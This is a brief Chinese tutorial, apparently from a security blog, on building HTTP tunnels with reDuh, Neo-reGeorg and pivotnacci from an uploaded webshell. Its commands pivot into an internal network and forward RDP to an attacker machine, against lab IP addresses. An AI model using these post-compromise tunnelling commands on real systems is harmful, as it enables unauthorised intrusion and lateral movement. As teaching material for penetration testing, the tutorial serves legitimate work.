免责声明
文章所涉及内容,仅供安全研究教学使用,由于传播、利用本文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任
这里我们介绍几种http隧道工具reDuh,Neo-reGeorg,pivotnacci-master
一.reDuh
当我们拿到一个webshell权限的时候,便可以在web服务器和vps上建立一个http的隧道通过reDuh搭建一个http隧道后将域内其他主机的3389的远程连接端口转发到vps或者攻击机上
-
2.在攻击机中启动client端java -jar reDuhClient.jar http://192.168.1.25/reDuh.php,建立http隧道
3.攻击机的1010端口开启监听,通过nc -nv 127.0.0.1 1010 进行一个正向代理管理
4.执行[createTunnel]8888:192.168.10.3 将靶机的3389端口的远程登陆服务转发到攻击机上的8888端口
5.使用rdesktop去连接本地的8888端口,rdesktop 127.0.0.1:8888
二.Neo-reGeorg
该工具就是在reDuh进行了一些升级
-
对文件文件先进行加密python neoreg.py generate -k password
2.通过webshell上传tunnel.php文件
3.将流量转发到攻击机的8888端口上 python neoreg.py -k password -u http://192.168.1.25/tunnel.php -p 8888
三.pivotnacci-master
1.pip3 install -r requirements.txt 安装库
2.python3 setup.py install
./pivotnacci http://192.168.1.25/agent.php -p 6666 --password test -v
4.配置本地的proxychains4.conf socks5 127.0.0.1 6666
5.proxychains rdesktop 192.168.10.3
原文始发于微信公众号(泾弦安全):http隧道
评论